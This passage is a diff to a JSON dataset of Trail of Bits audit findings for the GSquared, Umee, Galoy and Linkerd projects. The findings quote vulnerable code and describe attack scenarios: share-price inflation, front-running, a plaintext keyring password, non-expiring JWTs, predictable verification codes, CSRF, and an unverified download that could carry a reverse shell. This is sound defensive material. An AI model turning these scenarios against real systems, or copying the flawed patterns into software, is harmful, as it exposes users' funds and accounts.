beforeWithdraw(_assets, asset); _burn(_owner, shares); asset.safeTransfer(_receiver, _assets); emit Withdraw( msg.sender , _receiver, _owner, _assets, shares); return shares; Figure 11.4: The withdraw function in GVault.sol This means that the function favors the user, since they get some xed amount of assets for a rounded-down amount of shares. This issue should also be also considered when minting fees, since they should favor the protocol instead of the user or the strategy. Exploit Scenario Alice deploys a new GVault and provides some liquidity. Eve uses mints and withdrawals to slowly drain the liquidity, possibly aecting the internal bookkeeping of the GVault. Recommendations Short term, consider refactoring the GVault code to specify the rounding direction across the codebase in order keep the error in favor of the user or the protocol. Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "title": "35. Outdated and vulnerable dependencies ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "Both Umee and Peggo rely on outdated and vulnerable dependencies. The table below lists the problematic packages used by Umee dependencies; the yellow rows indicate packages that were also detected in Peggo dependencies. We set the severity of this nding to undetermined because we could not conrm whether these vulnerabilities aect Umee or Peggo. However, they likely do not, since most of the CVEs are related to binaries or components that are not run in the Umee or Peggo code. Package Vulnerabilities golang/github.com/coreos/etc d@3.3.13 pkg:golang/github.com/dgrija lva/jwt-go@3.2.0 CVE-2020-15114 CVE-2020-15136 CVE-2020-15115 CVE-2020-26160 golang/github.com/microcosm- cc/bluemonday@1.0.4 #111 (CWE-79) golang/k8s.io/kubernetes@1.1 3.0 CVE-2020-8558, CVE-2019-11248, CVE-2019-11247, CVE-2019-11243, CVE-2021-25741, CVE-2019-9946, CVE-2020-8552, CVE-2019-11253, CVE-2020-8559, CVE-2021-25735, CVE-2019-11250, CVE-2019-11254, CVE-2019-11249, CVE-2019-11246, CVE-2019-1002100, CVE-2020-8555, CWE-601, CVE-2019-11251, CVE-2019-1002101, CVE-2020-8563, CVE-2020-8557, CVE-2019-11244 Recommendations Short term, update the outdated and vulnerable dependencies. Even if they do not currently aect Umee or Peggo, a change in the way they are used could introduce a bug. Long term, integrate a dependency-checking tool such as nancy into the CI/CD pipeline. Frequently update any direct dependencies, and ensure that any indirect dependencies in upstream libraries remain up to date. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Low" + "Severity: Undetermined", + "Difficulty: High" ] }, { - "title": "12. Protocol migration is vulnerable to front-running and a loss of funds ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "The migration from Gro protocol to GSquared protocol can be front-run by manipulating the share price enough that the protocol loses a large amount of funds. The GMigration contract is responsible for initiating the migration from Gro to GSquared. The G Migration.prepareMigration function will deposit liquidity into the three-pool and then attempt to deposit the 3CRV LP token into the GVault contract in exchange for G3CRV shares (gure 12.1). Note that this migration occurs on a newly deployed GVault contract that holds no assets and has no supply of shares. 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 function prepareMigration ( uint256 minAmountThreeCRV ) external onlyOwner { if (!IsGTrancheSet) { revert Errors.TrancheNotSet(); } // read senior tranche value before migration seniorTrancheDollarAmount = SeniorTranche(PWRD).totalAssets(); uint256 DAI_BALANCE = ERC20(DAI).balanceOf( address ( this )); uint256 USDC_BALANCE = ERC20(USDC).balanceOf( address ( this )); uint256 USDT_BALANCE = ERC20(USDT).balanceOf( address ( this )); // approve three pool ERC20(DAI).safeApprove(THREE_POOL, DAI_BALANCE); ERC20(USDC).safeApprove(THREE_POOL, USDC_BALANCE); ERC20(USDT).safeApprove(THREE_POOL, USDT_BALANCE); // swap for 3crv IThreePool(THREE_POOL).add_liquidity( [DAI_BALANCE, USDC_BALANCE, USDT_BALANCE], minAmountThreeCRV ); //check 3crv amount received uint256 depositAmount = ERC20(THREE_POOL_TOKEN).balanceOf( address ( this ) ); // approve 3crv for GVault ERC20(THREE_POOL_TOKEN).safeApprove( address (gVault), depositAmount); // deposit into GVault uint256 shareAmount = gVault.deposit(depositAmount, address ( this )); // approve gVaultTokens for gTranche ERC20( address (gVault)).safeApprove( address (gTranche), shareAmount); 89 90 91 92 93 94 95 96 97 98 } } Figure 12.1: The prepareMigration function in GMigration.sol#L61-98 However, this prepareMigration function call is vulnerable to a share price ination attack. As noted in this issue , the end result of the attack is that the shares (G3CRV) that the GMigration contract will receive can redeem only a portion of the assets that were originally deposited by GMigration into the GVault contract. This occurs because the rst depositor in the GVault is capable of manipulating the share price signicantly, which is compounded by the fact that the deposit function in GVault rounds in favor of the protocol due to a division in convertToShares (see TOB-GRO-11 ). Exploit Scenario Alice, a GSquared developer, calls prepareMigration to begin the process of migrating funds from Gro to GSquared. Eve notices this transaction in the public mempool, and front-runs it with a small deposit and a large token (3CRV) airdrop. This leads to a signicant change in the share price. The prepareMigration call completes, but GMigration is left with a small, insucient amount of shares because it has suered from truncation in the convertToShares function. These shares can be redeemed for only a portion of the original deposit. Recommendations Short term, perform the GSquared system deployment and protocol migration using a private relay. This will mitigate the risk of front-running the migration or price share manipulation. Long term, implement the short- and long-term recommendations outlined in TOB-GRO-11 . Additionally, implement an ERC4626Router similar to Fei protocols implementation so that a minimum-amount-out can be specied for deposit, mint, redeem, and withdraw operations. References ERC4626RouterBase.sol ERC4626 share price ination", + "title": "25. Insecure storage of price-feeder keyring passwords ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "Users can store oracle keyring passwords in the price-feeder conguration le. However, the price-feeder stores these passwords in plaintext and does not provide a warning if the conguration le has overly broad permissions (like those shown in gure 25.1). Additionally, neither the price-feeder README nor the relevant documentation string instructs users to provide keyring passwords via standard input (gure 25.2), which is a safer approach. Moreover, neither source provides information on dierent keyring back ends, and the example price-feeder conguration uses the \"test\" back end . An attacker with access to the conguration le on a users system, or to a backup of the conguration le, could steal the users keyring information and hijack the price-feeder oracle instance. $ ls -la ./price-feeder/price-feeder.example.toml -rwx rwxrwx 1 dc dc 848 Feb 6 10:37 ./price-feeder/price-feeder.example.toml $ grep pass ./price-feeder/price-feeder.example.toml pass = \"exampleKeyringPassword\" $ ~/go/bin/price-feeder ./price-feeder/price-feeder.example.toml 10:42AM INF starting price-feeder oracle... 10:42AM ERR oracle tick failed error=\"key with addressA4F324A31DECC0172A83E57A3625AF4B89A91F1Fnot found: key not found\" module=oracle 10:42AM INF starting price-feeder server... listen_addr=0.0.0.0:7171 Figure 25.1: The price-feeder does not warn the user if the conguration le used to store the keyring password in plaintext has overly broad permissions. // CreateClientContext creates an SDK client Context instance used for transaction // generation, signing and broadcasting. func (oc OracleClient) CreateClientContext() (client.Context, error ) { var keyringInput io.Reader if len (oc.KeyringPass) > 0 { keyringInput = newPassReader(oc.KeyringPass) } else { keyringInput = os.Stdin } Figure 25.2: The price-feeder supports the use of standard input to provide keyring passwords. ( umee/price-feeder/oracle/client/client.go#L184-L192 ) Exploit Scenario A user sets up a price-feeder oracle and stores the keyring password in the price-feeder conguration le, which has been miscongured with overly broad permissions. An attacker gains access to another user account on the user's machine and is able to read the price-feeder oracle's keyring password. The attacker uses that password to access the keyring data and can then control the user's oracle account. Recommendations Short term, take the following steps: Recommend that users provide keyring passwords via standard input. Check the permissions of the conguration le. If the permissions are too broad, provide an error warning the user of the issue, as openssh does when it nds that a private key le has overly broad permissions. Document the risks associated with storing a keyring password in the conguration le. Improve the price-feeder s keyring-related documentation. Include a link to the Cosmos SDK keyring documentation so that users can learn about dierent keyring back ends and the addition of keyring entries, among other concepts.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "13. Incorrect slippage calculation performed during strategy investments and divestitures ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "The incorrect arithmetic calculation for slippage tolerance during strategy investments and divestitures can lead to an increased rate of failed prot-and-loss (PnL) reports and withdrawals. The ConvexStrategy contract is tasked with investing excess funds into a meta pool to obtain yield and divesting those funds from the pool whenever necessary. Investments are done via the invest function, and divestitures for a given amount are done via the divest function. Both functions have the ability to manage the amount of slippage that is allowed during the deposit and withdrawal from the meta pool. For example, in the divest function, the withdrawal will go through only if the amount of 3CRV tokens that will be transferred out from the pool (by burning meta pool tokens) is greater than or equal to the _debt , the amount of 3CRV that needs to be transferred out from the pool, discounted by baseSlippage (gure 13.1). Thus, both sides of the comparison must have units of 3CRV. 883 884 885 886 887 888 889 890 891 892 893 894 895 896 897 898 899 900 901 902 903 function divest ( uint256 _debt , bool _slippage ) internal returns ( uint256 ) { uint256 meta_amount = ICurveMeta(metaPool).calc_token_amount( [ 0 , _debt], false ); if (_slippage) { uint256 ratio = curveValue(); if ( (meta_amount * PERCENTAGE_DECIMAL_FACTOR) / ratio < ((_debt * (PERCENTAGE_DECIMAL_FACTOR - baseSlippage)) / PERCENTAGE_DECIMAL_FACTOR) revert StrategyErrors.LTMinAmountExpected(); ) { } } Rewards(rewardContract).withdrawAndUnwrap(meta_amount, false ); return ICurveMeta(metaPool).remove_liquidity_one_coin( meta_amount, CRV3_INDEX, 904 905 } ); Figure 13.1: The divest function in ConvexStrategy.sol#L883-905 To calculate the value of a meta pool token (mpLP) in terms of 3CRV, the curveValue function is called (gure 13.2). The units of the return value, ratio , are 3CRV/mpLP. 1170 1171 1172 1173 1174 } function curveValue () internal view returns ( uint256 ) { uint256 three_pool_vp = ICurve3Pool(CRV_3POOL).get_virtual_price(); uint256 meta_pool_vp = ICurve3Pool(metaPool).get_virtual_price(); return (meta_pool_vp * PERCENTAGE_DECIMAL_FACTOR) / three_pool_vp; Figure 13.2: The curveValue function in ConvexStrategy.sol#L1170-1174 However, note that in gure 13.1, meta_amount value, which is the amount of mpLP tokens that need to be burned, is divided by ratio . From a unit perspective, this is multiplying an mpLP amount by a mpLP/3CRV ratio. The resultant units are not 3CRV. Instead, the arithmetic should be meta_amount multiplied by ratio. This would be mpLP times 3CRV/mpLP, which would result in the nal units of 3CRV. Assuming 3CRV/mpLP is greater than one, the division instead of multiplication will result in a smaller value, which increases the likelihood that the slippage tolerance is not met. The invest and divest functions are called during PnL reporting and withdrawals. If there is a higher risk for the functions to revert because the slippage tolerance is not met, the likelihood of failed PnL reports and withdrawals also increases. Exploit Scenario Alice wishes to withdraw some funds from the GSquared protocol. She calls GRouter.withdraw and with a reasonable minAmount . The GVault contract calls the ConvexStrategy contract to withdraw some funds to meet the necessary withdrawal amount. The strategy attempts to divest the necessary amount of funds. However, due to the incorrect slippage arithmetic, the divest function reverts and Alices withdrawal is unsuccessful. Recommendations Short term, in divest , multiply meta_amount by ratio . In invest , multiply amount by ratio . Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "title": "26. Insu\u0000cient validation of genesis parameters ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "A few system parameters must be set correctly for the system to function properly. The system checks the parameter input against minimum and maximum values (not always correctly) but does not check the correctness of the parameters dependencies. Exploit Scenario When preparing a protocol upgrade, the Umee team accidentally introduces an invalid value into the conguration le. As a result, the upgrade is deployed with an invalid or unexpected parameter. Recommendations Short term, implement proper validation of congurable values to ensure that the following expected invariants hold: BaseBorrowRate <= KinkBorrowRate <= MaxBorrowRate LiquidationIncentive <= some maximum CompleteLiquidationThreshold > 0 (The third invariant is meant to prevent division by zero in the Interpolate method.)", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Low" + "Severity: Low", + "Difficulty: High" ] }, { - "title": "14. Potential division by zero in _calcTrancheValue ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "Junior tranche withdrawals may fail due to an unexpected division by zero error. One of the key steps performed during junior tranche withdrawals is to identify the dollar value of the tranche tokens that will be burned by calling _calcTrancheValue (gure 14.1). function _calcTrancheValue ( bool _tranche , uint256 _amount , uint256 _total 559 560 561 562 563 ) public view returns ( uint256 ) { 564 565 566 567 568 } uint256 factor = getTrancheToken(_tranche).factor(_total); uint256 amount = (_amount * DEFAULT_FACTOR) / factor; if (amount > _total) return _total; return amount; Figure 14.1: The _calcTrancheValue function in GTranche.sol#L559-568 To calculate the dollar value, the factor function is called to identify how many tokens represent one dollar. The dollar value, amount , is then the token amount provided, _amount , divided by factor . However, an edge case in the factor function will occur if the total supply of tranche tokens (junior or senior) is non-zero while the amount of assets backing those tokens is zero. Practically, this can happen only if the system is exposed to a loss large enough that the assets backing the junior tranche tokens are completely wiped. In this edge case, the factor function returns zero (gure 14.2). The subsequent division by zero in _calcTrancheValue will cause the transaction to revert. 525 526 527 528 529 function factor ( uint256 _totalAssets ) public view override returns ( uint256 ) 530 { 531 532 533 534 535 536 537 538 539 if (totalSupplyBase() == 0 ) { return getInitialBase(); } if (_totalAssets > 0 ) { return totalSupplyBase().mul(BASE).div(_totalAssets); } // This case is totalSupply > 0 && totalAssets == 0, and only occurs on system loss 540 541 } return 0 ; Figure 14.2: The factor function in GToken.sol#L525-541 It is important to note that if the system enters a state where there are no assets backing the junior tranche, junior tranche token holders would be unable to withdraw anyway. However, this division by zero should be caught in _calcTrancheValue , and the requisite error code should be thrown. Recommendations Short term, add a check before the division to ensure that factor is greater than zero. If factor is zero, throw a custom error code specically created for this situation. Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "title": "31. Lack of prioritization of Peggo orchestrator messages ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "Peggo orchestrator messages, like oracle messages ( TOB-UMEE-20 ), are not prioritized over other transactions for inclusion in a block. As a result, if the network is highly congested, orchestrator transactions may not be included in the earliest possible block. Although the Umee system could increase the fee charged for including a Peggo orchestrator message in a block, that solution is suboptimal and may not work. Tactics for prioritizing important transactions include the following: Using the custom CheckTx implementation introduced in Tendermint version 0.35 , which returns a priority argument Reimplementing part of the Tendermint engine , as Terra Money did Using Substrates dispatch classes , which allow developers to mark transactions as normal , operational , or mandatory Exploit Scenario A user sends tokens from Ethereum to Umee by calling Gravity Bridges sendToCosmos function. When validators notice the transaction in the Ethereum logs, they send MsgSendToCosmosClaim messages to Umee. However, 34% of the messages are front-run by an attacker, eectively stopping Umee from acknowledging the token transfer. Recommendations Short term, use a custom CheckTx method to prioritize Peggo orchestrator messages. Long term, ensure that operations that aect the whole system cannot be front-run or delayed by attackers or blocked by network congestion.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Undetermined", + "Difficulty: Medium" ] }, { - "title": "15. Token withdrawals from GTranche are sent to the incorrect address ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "The GTranche withdrawal function takes in a _recipient address to send the G3CRV shares to, but instead sends those shares to msg.sender (gure 15.1). 212 213 214 215 216 217 ) 218 219 220 221 { function withdraw ( uint256 _amount , uint256 _index , bool _tranche , address _recipient external override returns ( uint256 yieldTokenAmounts , uint256 calcAmount ) trancheToken.burn( msg.sender , factor, calcAmount); token.transfer( msg.sender , yieldTokenAmounts); . [...] . 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 } emit LogNewWithdrawal( msg.sender , _recipient, _amount, _index, _tranche, yieldTokenAmounts, calcAmount ); return (yieldTokenAmounts, calcAmount); Figure 15.1: The withdraw function in GTranche.sol#L219-259 Since GTranche withdrawals are performed by the GRouter contract on behalf of the user, the msg.sender and _recipient address are the same. However, a direct call to GTranche.withdraw by a user could lead to unexpected consequences. Recommendations Short term, change the destination address to _recipient instead of msg.sender . Long term, increase unit test coverage to include tests directly on GTranche and associated contracts in addition to performing the unit tests through the GRouter contract.", + "title": "32. Failure of a single broadcast Ethereum transaction causes a batch-wide failure ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The Peggo orchestrator broadcasts Ethereum events as Cosmos messages and sends them in batches of 10 ( at least by default ). According to a code comment (gure 32.1), if the execution of a single message fails on the Umee side, all of the other messages in the batch will also be ignored. We set the severity of this nding to undetermined because it is unclear whether it is exploitable. // runTx processes a transaction within a given execution mode, encoded transaction // bytes, and the decoded transaction itself. All state transitions occur through // a cached Context depending on the mode provided. State only gets persisted // if all messages get executed successfully and the execution mode is DeliverTx. // Note, gas execution info is always returned. A reference to a Result is // returned if the tx does not run out of gas and if all the messages are valid // and execute successfully. An error is returned otherwise. func (app *BaseApp) runTx(mode runTxMode, txBytes [] byte , tx sdk.Tx) (gInfo sdk.GasInfo, result *sdk.Result, err error ) { Figure 32.1: cosmos-sdk/v0.45.1/baseapp/baseapp.go#L568-L575 Recommendations Short term, review the practice of ignoring an entire batch of Peggo-broadcast Ethereum events when the execution of one of them fails on the Umee side, and ensure that it does not create a denial-of-service risk. Alternatively, change the system such that it can identify any messages that will fail and exclude them from the batch. Long term, generate random messages corresponding to Ethereum events and use them in testing to check the systems handling of failed messages.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Undetermined", "Difficulty: High" ] }, { - "title": "16. Solidity compiler optimizations can be problematic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "The GSquared Protocol contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. Security issues due to optimization bugs have occurred in the past . A medium- to high-severity bug in the Yul optimizer was introduced in Solidity version 0.8.13 and was xed only recently, in Solidity version 0.8.17 . Another medium-severity optimization bugone that caused memory writes in inline assembly blocks to be removed under certain conditions was patched in Solidity 0.8.15. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations causes a security vulnerability in the GSquared Protocol contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "title": "1. Insecure download process for the yq tool ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The Dockerle uses the Wget utility to download the yq tool but does not verify the le it has downloaded by its checksum or signature. Without verication, an archive that has been corrupted or modied by a malicious third party may not be detected. Figures 1.1 and 1.2 show cases in which a tool is downloaded without verication of its checksum. 6 RUN wget https://github.com/mikefarah/yq /releases/download/v4.17.2/yq_linux_386.tar.gz -O - | \\ 7 tar xz && mv yq_linux_386 /usr/bin/yq Figure 1.1: The Dockerle downloads and unarchives the yq tool. ( ci/image/Dockerfile#67 ) 41 wget https://github.com/bodymindarts/cepler /releases/download/v ${ cepler_version } /cepler-x 86_64-unknown-linux-musl- ${ cepler_version } .tar.gz \\ 42 && tar -zxvf cepler-x86_64-unknown-linux-musl- ${ cepler_version } .tar.gz \\ 43 && mv cepler-x86_64-unknown-linux-musl- ${ cepler_version } /cepler /usr/local/bin \\ 44 && chmod +x /usr/local/bin/cepler \\ 45 && rm -rf ./cepler-* Figure 1.2: The bastion-startup script downloads and unarchives the cepler tool. ( modules/inception/gcp/bastion-startup.tmpl#4145 ) Exploit Scenario An attacker gains access to the GitHub repository from which yq is downloaded. The attacker then modies the binary to create a reverse shell upon yq s startup. When a user runs the Dockerle, the attacker gains access to the users container. Recommendations Short term, have the Dockerle and other scripts in the solution verify each le they download by its checksum . Long term, implement checks to ensure the integrity of all third-party components used in the solution and periodically check that all components are downloaded from encrypted URLs.", "labels": [ "Trail of Bits", "Severity: Low", @@ -2852,9 +5600,9 @@ ] }, { - "title": "1. Lack of rate-limiting mechanisms in the identity service ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "The identity service issues signed certicates to sidecar proxies within Linkerd-integrated infrastructure. When proxies initialize for the rst time, they request a certicate from the identity service. However, the identity service lacks sucient rate-limiting mechanisms, which may make it prone to denial-of-service attacks. Because identity controllers are shared among pods in a cluster, a denial of service of an identity controller may aect the availability of applications across the cluster. Threat Scenario An attacker obtains access to the sidecar proxy in one of the user application namespaces. Due to the lack of rate-limiting mechanisms within the identity service, the proxy can now repeatedly request a newly signed certicate as if it were a proxy sidecar initializing for the rst time. Recommendations Short term, add rate-limiting mechanisms to the identity service to prevent a single pod from requesting too many certicates or performing other computationally intensive actions. Long term, ensure that appropriate rate-limiting mechanisms exist throughout the infrastructure to prevent denial-of-service attacks. Where possible, implement stricter access controls to ensure that components cannot interact with APIs more than necessary. Additionally, ensure that the system suciently logs events so that an audit trail is available in the event of an attack. 33 Linkerd Threat Model", + "title": "2. Use of unencrypted HTTP scheme ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The Galoy ipfetcher module uses the unencrypted HTTP scheme (gure 2.1). As a result, an attacker in the same network as the host invoking the code in gure 2.1 could intercept and modify both the request and ipfetcher s response to it, potentially accessing sensitive information. 8 9 const { data } = await axios.get( ` http ://proxycheck.io/v2/ ${ ip } ?key= ${ PROXY_CHECK_APIKEY } &vpn=1&asn=1` , 10 ) Figure 2.1: src/services/ipfetcher/index.ts#810 Exploit Scenario Eve gains access to Alices network and obtains Alices PROXY_CHECK_APIKEY by observing the unencrypted network trac. Recommendations Short term, change the URL scheme used in the ipfetcher service to HTTPS. Long term, use tools such as WebStorm code inspections to nd other uses of unencrypted URLs.", "labels": [ "Trail of Bits", "Severity: Low", @@ -2862,9 +5610,9 @@ ] }, { - "title": "2. Lack of rate-limiting mechanisms in the destination service ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "The destination service contains trac-routing information for sidecar proxies within Linkerd-integrated infrastructure. However, the destination service lacks sucient rate-limiting mechanisms, which may make it prone to denial-of-service attacks if a pod repeatedly changes its availability status. Because destination controllers are shared among pods in a cluster, a denial of service of a destination controller may aect the availability of applications across the cluster. Threat Scenario An attacker obtains access to the sidecar proxy in one of the user application namespaces. Due to the lack of rate-limiting mechanisms within the destination service, the proxy can now repeatedly request routing information or change its availability status to force updates in the controller. Recommendations Short term, add rate-limiting mechanisms to the destination service to prevent a single pod from requesting too much routing information or performing state updates too quickly. Long term, ensure that appropriate rate-limiting mechanisms exist throughout the infrastructure to prevent denial-of-service attacks. Where possible, implement stricter access controls to ensure that components cannot interact with APIs more than necessary. Additionally, ensure that the system suciently logs events so that an audit trail is available in the event of an attack. 34 Linkerd Threat Model", + "title": "3. Lack of expiration and revocation mechanism for JWTs ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The Galoy system uses JSON web tokens (JWTs) for authentication. A user obtains a new JWT by calling the userLogin GraphQL mutation. Once a token has been signed, it is valid forever; the platform does not set an expiration time for tokens and cannot revoke them. 7 export const createToken = ({ 8 uid, 9 network, 10 }: { 11 uid: UserId 12 network: BtcNetwork 13 }): JwtToken => { 14 return jwt.sign({ uid, network }, JWT_SECRET, { // (...) 25 algorithm: \"HS256\" , 26 }) as JwtToken 27 } Figure 3.1: The creation of a JWT ( src/services/jwt.ts#727 ) Exploit Scenario An attacker obtains a users JWT and gains persistent access to the system. The attacker then engages in destructive behavior. The victim eventually notices the behavior but does not have a way to stop it. Recommendations Short term, consider setting an expiration time for JWTs, and implement a mechanism for revoking tokens. That way, if a JWT is leaked, an attacker will not gain persistent access to the system.", "labels": [ "Trail of Bits", "Severity: Medium", @@ -2872,9 +5620,9 @@ ] }, { - "title": "3. CLI tool allows the use of insecure protocols when externally sourcing infrastructure denitions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "When using the command-line interface (CLI) tool, an operator may source infrastructural YAML denitions from a URI path specifying any protocol, such as http:// or https://. Therefore, a user could expose sensitive information when using an insecure protocol such as HTTP. Furthermore, the Linkerd documentation does not warn users about the systems use of insecure protocols. Threat Scenario An infrastructure operator integrates Linkerd into her infrastructure. When doing so, she uses the CLI tool to fetch YAML denitions over HTTP. Unbeknownst to her, the use of HTTP has made her data visible to attackers on the local network. Her data is also prone to man-in-the-middle attacks. Recommendations Short term, disallow the use of insecure protocols within the CLI tool when sourcing external data. Alternatively, provide documentation and best practices regarding the use of insecure protocols when externally sourcing data within the CLI tool. 35 Linkerd Threat Model 4. Exposure of admin endpoint may a\u0000ect application availability Severity: Medium Diculty: Medium Type: Awareness and Training Finding ID: TOB-LKDTM-4 Target: linkerd-proxy", + "title": "4. Use of insecure function to generate phone codes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The Galoy application generates a verication code by using the JavaScript function Math.random() , which is not a cryptographically secure pseudorandom number generator (CSPRNG) . const randomIntFromInterval = (min, max) => Math .floor( Math .random() * (max - min + 1 ) + min) 10 11 12 // (...) 82 83 84 85 86 87 const code = String ( randomIntFromInterval( 100000 , 999999 ) ) as PhoneCode const galoyInstanceName = getGaloyInstanceName() const body = ` ${ code } is your verification code for ${ galoyInstanceName } ` const result = await PhoneCodesRepository().persistNew({ 88 phone: phoneNumberValid , 89 code, 90 }) 91 92 93 94 95 96 } if (result instanceof Error ) return result const sendTextArguments = { body, to: phoneNumberValid , logger } return TwilioClient().sendText(sendTextArguments) Figure 4.1: src/app/users/request-phone-code.ts#1096 Exploit Scenario An attacker repeatedly generates verication codes and analyzes the values and the order of their generation. The attacker attempts to deduce the pseudorandom number generator's internal state. If successful, the attacker can then perform an oine calculation to predict future verication codes. Recommendations Short term, replace Math.random() with a CSPRNG. Long term, always use a CSPRNG to generate random values for cryptographic operations.", "labels": [ "Trail of Bits", "Severity: Low", @@ -2882,9 +5630,9 @@ ] }, { - "title": "5. Gos pprof endpoints enabled by default in all admin servers ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "All core components of the Linkerd infrastructure, in both the data and control planes, have an admin server with Gos server runtime proler (pprof) endpoints on /debug/pprof enabled by default. These servers are not exposed to the rest of the cluster or to the local network by default. Threat Scenario An attacker scans the network in which a Linkerd cluster is congured and discovers that an operator forwarded the admin server port to the local network, exposing the pprof endpoints to the local network. He connects a proler to it and gains access to debug information, which assists him in mounting further attacks. Recommendations Short term, add a check to http.go that enables pprof endpoints only when Linkerd runs in debug or test mode. Long term, audit all debug-related functionality to ensure it is not exposed when Linkerd is running in production mode. References Your pprof is showing: IPv4 scans reveal exposed net/http/pprof endpoints 37 Linkerd Threat Model", + "title": "5. Redundant basic authentication method ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The Galoy application implements a basic authentication method (gure 5.1) that is redundant because the apiKey is not being used. Superuous authentication methods create new attack vectors and should be removed from the codebase. 1 2 3 import express from \"express\" const formatError = new Error ( \"Format is Authorization: Basic \" ) 4 5 export default async function ( 6 req: express.Request , 7 _res: express.Response , 8 next: express.NextFunction , 9 ) { 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 const authorization = req.headers[ \"authorization\" ] if (!authorization) return next() const parts = authorization.split( \" \" ) if (parts.length !== 2 ) return next() const scheme = parts[ 0 ] if (! /Basic/i .test(scheme)) return next() const credentials = Buffer. from (parts[ 1 ], \"base64\" ).toString().split( \":\" ) if (credentials.length !== 2 ) return next(formatError) const [apiKey, apiSecret] = credentials if (!apiKey || !apiSecret) return next(formatError) 25 req[ \"apiKey\" ] = apiKey 26 req[ \"apiSecret\" ] = apiSecret 27 next() 28 } Figure 5.1: The basic authentication method implementation ( src/servers/middlewares/api-key-auth.ts#128 ) Recommendations Short term, remove the apiKey -related code. Long term, review and clearly document the Galoy authentication methods.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2892,9 +5640,9 @@ ] }, { - "title": "6. Lack of access controls on the linkerd-viz dashboard ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "Linkerd operators can enable a set of metrics-focused features by adding the linkerd-viz extension. Doing so enables a web UI dashboard that lists detailed information about the namespaces, services, pods, containers, and other resources in a Kubernetes cluster in which Linkerd is congured. Operators can enable Kubernetes role-based access controls to the dashboard; however, no access control options are provided by Linkerd. Threat Scenario An attacker scans the network in which a Linkerd cluster is congured and discovers an exposed UI dashboard. By accessing the dashboard, she gains valuable insight into the cluster. She uses the knowledge gained from exploring the dashboard to formulate attacks that would expand her access to the network. Recommendations Short term, document recommendations for restructuring access to the linkerd-viz dashboard. Long term, add authentication and authorization controls for accessing the dashboard. This could be done by implementing tokens created via the CLI or client-side authorization logic. 38 Linkerd Threat Model", + "title": "6. GraphQL queries may facilitate CSRF attacks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The Galoy applications /graphql endpoint handles queries sent via GET requests. It is impossible to pass state-changing mutations or subscriptions in GET requests, and authorized queries need the Authorization: Bearer header. However, if a state-changing GraphQL operation were mislabeled as a query (typically a non-state-changing request), the endpoint would be vulnerable to cross-site request forgery (CSRF) attacks. Exploit Scenario An attacker creates a malicious website with JavaScript code that sends requests to the /graphql endpoint (gure 6.1). When a user visits the website, the JavaScript code is executed in the users browser, changing the servers state.
